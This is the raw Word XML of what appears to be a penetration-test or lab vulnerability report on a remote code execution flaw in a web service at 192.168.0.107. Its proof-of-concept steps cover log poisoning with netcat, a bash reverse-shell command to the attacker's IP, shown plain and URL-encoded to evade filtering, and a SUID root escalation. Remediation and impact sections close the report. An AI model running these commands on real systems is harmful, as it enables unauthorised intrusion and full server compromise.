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3D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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450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3D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23F5B5B3" w14:textId="61567573" w:rsidR="00D43D23" w:rsidRDefault="00286F60">
            <w:r>
              <w:t>192.168.0.</w:t>
            </w:r>
            <w:r w:rsidR="00D33049">
              <w:t>107</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="0B2C395D" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B59B2C7" w14:textId="70E49103" w:rsidR="00D43D23" w:rsidRDefault="003D1D02">
            <w:r>
              <w:t>Remote Code Execution triggered through user-supplied URL parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="54E32C67" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFA718E" w14:textId="1E4D598B" w:rsidR="00D43D23" w:rsidRDefault="00D33049" w:rsidP="00D33049">
            <w:r>
              <w:t>TCP 8593</w:t>
            </w:r>
            <w:r w:rsidR="00D43D23">
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">http </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="01ACD642" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58604E68" w14:textId="4A403C98" w:rsidR="00D43D23" w:rsidRDefault="00D33049">
            <w:r>
              <w:t xml:space="preserve">7.4 </w:t>
            </w:r>
            <w:r w:rsidR="00AA551C">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="0B2BF3BA" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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Attack Vetor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6212ED71" w14:textId="66E81611" w:rsidR="00D43D23" w:rsidRDefault="00D33049">
            <w:r w:rsidRPr="00D33049">
              <w:t>CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="554B30B1" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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(PoC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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6546D2A2" w:rsidR="00D43D23" w:rsidRDefault="00B73271">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73271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68D98006" wp14:editId="7B11646E">
                  <wp:extent cx="5731510" cy="1747520"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="508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4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77777777" w:rsidR="00D43D23" w:rsidRDefault="00D43D23">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>STEP 2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> – Nmap Scan to discover open ports and Services </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A86A63D" w14:textId="0336097C" w:rsidR="00B73271" w:rsidRDefault="00B73271">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –p- -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r w:rsidR="00614E08">
              <w:t>–</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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4B1694B7" w14:textId="4CEC1F0F" w:rsidR="00614E08" w:rsidRDefault="00614E08">
            <w:r w:rsidRPr="00614E08">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19707132" wp14:editId="09B3507A">
                  <wp:extent cx="5731510" cy="751840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51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19431" w14:textId="57DA7D6F" w:rsidR="00D43D23" w:rsidRDefault="00614E08">
            <w:r>
              <w:t>Note:</w:t>
            </w:r>
            <w:r w:rsidR="00AA14CD">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>we found a HTTP hosted on 8593 port</w:t>
            </w:r>
            <w:r w:rsidR="00B52CB8">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50556114" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="2EB07B72" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8">
            <w:r w:rsidRPr="00B52CB8">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79F59B28" wp14:editId="6C8FFE87">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65405</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="page">
                    <wp:posOffset>3949065</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4836160" cy="1343025"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21447"/>
                      <wp:lineTo x="21526" y="21447"/>
                      <wp:lineTo x="21526" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight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16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0F736C" w14:textId="74DFC527" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">- We found a misconfiguration in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>URl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i.e</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> “book=list”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65446D31" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="0D1DCAF1" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="4AFF46BB" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="3E496334" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="206F919E" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="60CBF66F" w14:textId="1A2236C5" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-I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0073D424" wp14:editId="272AEAF7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173990</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4667250" cy="2973070"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom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97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AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 4-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> we can use log poisoning on the apache file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6D8EE5" w14:textId="38366735" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="28BF039B" w14:textId="1716311A" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8">
            <w:r w:rsidRPr="00AA14CD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0288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AE59A5A" wp14:editId="79AA82D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170815</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4836160" cy="3176270"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
                  <wp:wrapSquare wrapText="bothSides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616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AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 5</w:t>
            </w:r>
            <w:r>
              <w:t>- We can definitely do that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BE9171" w14:textId="77777777" w:rsidR="00B52CB8" w:rsidRDefault="00B52CB8"/>
          <w:p w14:paraId="46D338A3" w14:textId="77777777" w:rsidR="006E552A" w:rsidRDefault="006E552A">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 6-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Now we will </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>posion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the log using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2C33C9E0" w14:textId="77777777" w:rsidR="006E552A" w:rsidRDefault="006E552A">
            <w:r w:rsidRPr="006E552A">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBFCE28" wp14:editId="5554AB13">
                  <wp:extent cx="5731510" cy="1202055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0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46546" w14:textId="77777777" w:rsidR="006E552A" w:rsidRDefault="006E552A"/>
          <w:p w14:paraId="0B151965" w14:textId="77777777" w:rsidR="00AA14CD" w:rsidRDefault="00AA14CD"/>
          <w:p w14:paraId="041940E0" w14:textId="77777777" w:rsidR="00AA14CD" w:rsidRDefault="00AA14CD"/>
          <w:p w14:paraId="1C59DF06" w14:textId="630573E2" w:rsidR="006E552A" w:rsidRDefault="006E552A">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Step 7-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Now we are able to execute commands in the URL like this:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D102C8" w14:textId="309635C6" w:rsidR="00AF6F92" w:rsidRDefault="006E552A">
            <w:r w:rsidRPr="006E552A">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C673FF7" wp14:editId="06359F9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2540</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5105400" cy="739775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:wrapSquare wrapText="bothSides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73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0D99AE58" w14:textId="456E11A2" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 8-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>listning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2AA75C61" w14:textId="3A259610" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AF6F92">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFAB961" wp14:editId="03A6A8B7">
                  <wp:extent cx="4515480" cy="1438476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5480" cy="143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32C3B" w14:textId="77777777" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92"/>
          <w:p w14:paraId="508B74C0" w14:textId="7AC604D7" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 9-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Now we will run query through URL to get a reverse shell before that encode the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>query  to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> avoid bad character detection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B4ACFC" w14:textId="6592ED5F" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Query</w:t>
            </w:r>
            <w:r w:rsidR="00F953C4" w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> (attacker’s IP)</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6F92">
              <w:t>bash -c 'b</w:t>
            </w:r>
            <w:r w:rsidR="00F953C4">
              <w:t>ash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F953C4">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F953C4">
              <w:t xml:space="preserve"> &gt;&amp; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F953C4">
              <w:t>dev</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F953C4">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F953C4">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F953C4">
              <w:t>/192.168.0.182</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6F92">
              <w:t>/9090 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="473DCD5A" w14:textId="1DF5A64D" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Encoded:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6F92">
              <w:t>bash%20-c%20%27bash%20-i%20%3E%2</w:t>
            </w:r>
            <w:r w:rsidR="00F953C4">
              <w:t>6%20%2Fdev%2Ftcp%2F192.168.0.182</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6F92">
              <w:t>%2F9090%200%3E%261%27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B73F4C" w14:textId="77777777" w:rsidR="006E552A" w:rsidRDefault="00AF6F92">
            <w:r w:rsidRPr="00AF6F92">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000B93D4" wp14:editId="5732ECE7">
                  <wp:extent cx="5731510" cy="525780"/>
                  <wp:effectExtent l="0" t="0" r="254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25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424DF" w14:textId="77777777" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92"/>
          <w:p w14:paraId="301EEC97" w14:textId="77777777" w:rsidR="00AF6F92" w:rsidRDefault="00AF6F92">
            <w:r>
              <w:t xml:space="preserve">Step 10- After executing the query in the URL we will get a shell on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D8C0F7" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="136F8EBD" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="71B31DD4" w14:textId="77777777" w:rsidR="00AF6F92" w:rsidRDefault="00D33049">
            <w:r w:rsidRPr="00D33049">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E345CB" wp14:editId="0DF94EB9">
                  <wp:extent cx="5731510" cy="1518920"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="508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1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C4DB1" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="448D6CEC" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="66420651" w14:textId="46171D83" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t>Step 11- We will take the root access now, we found a folder called “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">” with root execute and change SUID permissions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="507E3CA4" w14:textId="75CB5968" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1531F45A" wp14:editId="3877E70E">
                  <wp:extent cx="5731510" cy="1639570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3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ED02D" w14:textId="55C5148E" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Step 12- we found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index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file running locally on port 57.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B26CFF" w14:textId="68A29972" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E58F1E" wp14:editId="41B05088">
                  <wp:extent cx="4686954" cy="78115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0E5B0F" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="7A775BE0" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t>Step 13-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>We  will</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> inject remote access code in the file and run it locally.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5825DF" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F25FF1F" wp14:editId="4FB9289E">
                  <wp:extent cx="5144218" cy="1495634"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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18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181C7" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="1B8697A3" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t>Step 14-Now we will call the file to run our script.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC80FC5" w14:textId="03C2A22F" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD493C1" wp14:editId="6235332B">
                  <wp:extent cx="4544059" cy="428685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059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F8F394" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="50997421" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t xml:space="preserve">Step 15-The script copies the dash file and pastes </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>it  the</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> folder.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35413A0A" w14:textId="5A2D44EB" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15B9CDE8" wp14:editId="141CEB4A">
                  <wp:extent cx="4944165" cy="1228896"/>
                  <wp:effectExtent l="0" t="0" r="889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165" cy="1228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58137" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E9D05D" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r>
              <w:t>Step 16- Now we can run the dash file to get root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5321FD90" w14:textId="3BE275FC" w:rsidR="002A11E5" w:rsidRDefault="002A11E5">
            <w:r w:rsidRPr="002A11E5">
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79D51B50" wp14:editId="7F85B2EF">
                  <wp:extent cx="5731510" cy="3714115"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6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1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E8A29" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5"/>
          <w:p w14:paraId="50FC6DA4" w14:textId="77777777" w:rsidR="002A11E5" w:rsidRDefault="002A11E5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</w:t>
            </w:r>
            <w:r w:rsidRPr="002A11E5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>roof</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381D40C9" w14:textId="5C1E51AC" w:rsidR="00BC0B6F" w:rsidRPr="002A11E5" w:rsidRDefault="00BC0B6F">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC0B6F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123011E6" wp14:editId="592B52EF">
                  <wp:extent cx="4210638" cy="1095528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D43D23" w14:paraId="57E49B2C" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787D4A77" w14:textId="0FEB5B80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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75343EDB" w14:textId="77777777" w:rsidR="006F33C3" w:rsidRDefault="006F33C3" w:rsidP="006F33C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Validate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and sanitize all URL inputs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705C4553" w14:textId="77777777" w:rsidR="006F33C3" w:rsidRDefault="006F33C3" w:rsidP="006F33C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Avoid</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>system()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exec()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eval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  <w:r>
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDC8567" w14:textId="77777777" w:rsidR="006F33C3" w:rsidRDefault="006F33C3" w:rsidP="006F33C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Use</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> safe APIs or whitelisted commands.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF68AD3" w14:textId="77777777" w:rsidR="006F33C3" w:rsidRDefault="006F33C3" w:rsidP="006F33C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Run</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> web services with least privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6938824A" w14:textId="77777777" w:rsidR="006F33C3" w:rsidRDefault="006F33C3" w:rsidP="006F33C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Disable</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> dangerous functions and use a WAF for extra protection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799EB076" w14:textId="6C305E6F" w:rsidR="00D43D23" w:rsidRDefault="00D43D23">
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="205582D5" w14:textId="77777777" w:rsidTr="00D33049">
        <w:trPr>
          <w:trHeight w:val="958"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B35DACE" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00D43D23" w:rsidP="00440943">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00440943">
              <w:rPr>
                <w:rFonts w:hAnsi="Symbol"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r w:rsidR="00440943">
              <w:t xml:space="preserve">  Remote</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00440943">
              <w:t xml:space="preserve"> attacker can execute arbitrary system commands.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C17E0DD" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00440943" w:rsidP="0044094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Full</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> compromise of the web server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1A3176" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00440943" w:rsidP="0044094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Unauthorized</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> access to sensitive data and files.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E85808" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00440943" w:rsidP="00440943">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hAnsi="Symbol"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t></w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  Possibility</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to upload malware or backdoors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A85EE6A" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00440943" w:rsidP="0044094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Lateral</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> movement to internal systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F184B99" w14:textId="77777777" w:rsidR="00440943" w:rsidRDefault="00440943" w:rsidP="0044094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Website</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> defacement or service disruption.</w:t>
            </w:r>
          </w:p>
